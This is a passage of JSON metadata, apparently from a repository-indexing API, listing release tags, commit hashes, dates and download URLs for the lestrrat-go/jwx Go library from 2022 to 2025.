eases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1/manifests"},{"name":"v2.1.5","sha":"a980d2346e8d17ddab69742e30ca1070018b0bf6","kind":"commit","published_at":"2025-04-16T11:17:27.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5/manifests"},{"name":"v1.2.31","sha":"26ecf5d02cf6226f49e703bdddcae54dcf5ae0da","kind":"commit","published_at":"2025-04-09T10:38:17.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.31","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31/manifests"},{"name":"v3.0.0","sha":"8884a402374939b27c9b96782e9e60a31aed75f6","kind":"commit","published_at":"2025-03-31T23:45:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0/manifests"},{"name":"v3.0.0-beta2","sha":"c44f4f6a7da1328f467d9c4a31f884bc7fd27fa6","kind":"commit","published_at":"2025-03-29T23:21:02.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2/manifests"},{"name":"v3.0.0-beta1","sha":"766a05908e5a0a90c40e5abb8cc4a3cfa523c7e8","kind":"commit","published_at":"2025-03-14T23:55:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1/manifests"},{"name":"v3.0.0-alpha3","sha":"da52a87c8b4bfb1d68fb6a07b1dc03d1be65d781","kind":"commit","published_at":"2025-03-13T00:03:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3/manifests"},{"name":"v3.0.0-alpha2","sha":"0076496d247519f9650be6c5fff022f3a70e488c","kind":"commit","published_at":"2025-02-25T09:36:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2/manifests"},{"name":"v2.1.4","sha":"de347302071b3af3457ac67e9885e1396b6ec023","kind":"commit","published_at":"2025-02-25T09:32:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"9e379c7bc07f7d931efcf6082b5456379aba496f","kind":"commit","published_at":"2024-11-24T10:03:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3/manifests"},{"name":"v3.0.0-alpha1","sha":"64985973018b6e8057905dc107d442a9f52c92c8","kind":"commit","published_at":"2024-11-01T06:22:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1/manifests"},{"name":"v2.1.2","sha":"536b643c661a886300246d2f334d4d836e61f497","kind":"commit","published_at":"2024-10-25T06:34:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2/manifests"},{"name":"v1.2.30","sha":"a7656533fb37069151200cc0d1d61fd44b459d77","kind":"commit","published_at":"2024-07-28T00:14:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.30","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30/manifests"},{"name":"v2.1.1","sha":"8d1d78351e9f259723f9f558889a78e327379683","kind":"commit","published_at":"2024-07-28T00:05:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"639d23173f8e958666dc34add887fe054d52790b","kind":"commit","published_at":"2024-06-17T22:49:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0/manifests"},{"name":"v1.2.29","sha":"1025f8eec3bd80c8d8f1be8f9cad989a5b78fd4b","kind":"commit","published_at":"2024-03-07T02:56:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.29","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29/manifests"},{"name":"v2.0.21","sha":"611d914efbccb0babbce54e48457070e12ab6498","kind":"commit","published_at":"2024-03-07T02:47:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21/manifests"},{"name":"v2.0.20","sha":"c3b3a177580a7aaa73a033706d0009871c49bd8d","kind":"commit","published_at":"2024-02-19T23:34:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20/manifests"},{"name":"v1.2.28","sha":"8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65","kind":"commit","published_at":"2024-01-09T01:52:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.28","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28/manifests"},{"name":"v2.0.19","sha":"d69a721931a5c48b9850a42404f18e143704adcd","kind":"commit","published_at":"2024-01-09T01:44:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19/manifests"},{"name":"v1.2.27","sha":"611567baacc0ef42263708892a08533812324a14","kind":"commit","published_at":"2023-12-03T07:23:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.27","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27/manifests"},{"name":"v2.0.18","sha":"e75b7c8dcbf8e56ecfbeb17b8b3ffaa81a96914f","kind":"commit","published_at":"2023-12-03T06:57:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18/manifests"},{"name":"v2.0.17","sha":"c02af3ecf9f8248181ce98056d90cd96605dd658","kind":"commit","published_at":"2023-11-20T04:20:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17/manifests"},{"name":"v2.0.16","sha":"3e23a27c76861ce73ca605b10969ba7107ec7117","kind":"commit","published_at":"2023-10-30T23:18:36.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16/manifests"},{"name":"v2.0.15","sha":"8074e35522a552c4c974004c8cd57c02cb5fd8e8","kind":"commit","published_at":"2023-10-19T23:39:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15/manifests"},{"name":"v2.0.14","sha":"42d47a75de7858fc60492f617a6ec4a9eda7d8dd","kind":"commit","published_at":"2023-10-17T00:54:09.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14/manifests"},{"name":"v2.0.13","sha":"be93b3f4afa02a079e3f2ca94da6a29e828cc4ed","kind":"commit","published_at":"2023-09-26T09:15:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13/manifests"},{"name":"v2.0.12","sha":"466c2774000a594f12a57dcf788be4e58e83ce04","kind":"commit","published_at":"2023-08-10T02:55:19.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12/manifests"},{"name":"v2.0.11","sha":"6c41e3822485fc7e11dd70b4b0524b075d66b103","kind":"commit","published_at":"2023-06-14T08:15:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11/manifests"},{"name":"v1.2.26","sha":"d9ddbc8e5009cfdd8c28413390b67afa7f576dd6","kind":"commit","published_at":"2023-06-14T08:09:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.26","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26/manifests"},{"name":"v2.0.10","sha":"8840ffd4afc5839f591ff0e9ba9034af52b1643e","kind":"commit","published_at":"2023-06-12T07:24:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10/manifests"},{"name":"v2.0.9","sha":"fccc52457a90ce00d625c3ed8d5d3443e903a91b","kind":"commit","published_at":"2023-03-21T03:29:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9/manifests"},{"name":"v2.0.8","sha":"7803b82f35c80ed24b6d8b730a11983f751904b8","kind":"commit","published_at":"2022-11-25T00:58:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8/manifests"},{"name":"v2.0.7","sha":"6e8e91832b11d1d13f53b5e0b9a49fcd10db1f27","kind":"commit","published_at":"2022-11-15T01:54:59.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7/manifests"},{"name":"v2.0.6","sha":"92950642291a3af54c5f1455ec68e76b390587ae","kind":"commit","published_at":"2022-08-25T13:19:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"c599c15c345121b1223fb7a744eaa07fdfe5e95e","kind":"commit","published_at":"2022-08-11T00:18:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"21f292826bf5f4cb76be98dcdfef9ce635835b5e","kind":"commit","published_at":"2022-07-19T05:24:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"650fe90d166ba9ada98474be3b9f6450701ffb71","kind":"commit","published_at":"2022-06-13T12:26:04.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"dc603b6e88971ce0c477c48fd8b77e84ffefb169","kind":"commit","published_at":"2022-05-23T12:58:39.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2/manifests"},{"name":"v1.2.25","sha":"ad8c29d1628435cdad008b5cbbfbe75f5bfc74ae","kind":"commit","published_at":"2022-05-23T12:48:33.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.25","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25/manifests"},{"name":"v2.0.1","sha":"0d365e4523faae8e9f3bbcbd5bc3a09cab951d49","kind":"commit","published_at":"2022-05-06T00:39:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1/manifests"},{"name":"v1.2.24","sha":"e38f677839edbeae5480e993d73eacb94f7af581","kind":"commit","published_at":"2022-05-05T01:00:31.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.24","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24/manifests"},{"name":"v2.0.0","sha":"8f97f606570bc3de90005ce3188824e7e7eff88a","kind":"commit","published_at":"2022-04-24T04:18:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta2","sha":"fd8fafc9fe0a7310d9dec456168a452d571c16b0","kind":"commit","published_at":"2022-04-16T06:50:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2/manifests"},{"name":"v1.2.23","sha":"baba5610e7fb53402e23c955edc10dbb25d73275","kind":"commit","published_at":"2022-04-13T09:52:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.23","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23","manifests_url":"https://repos.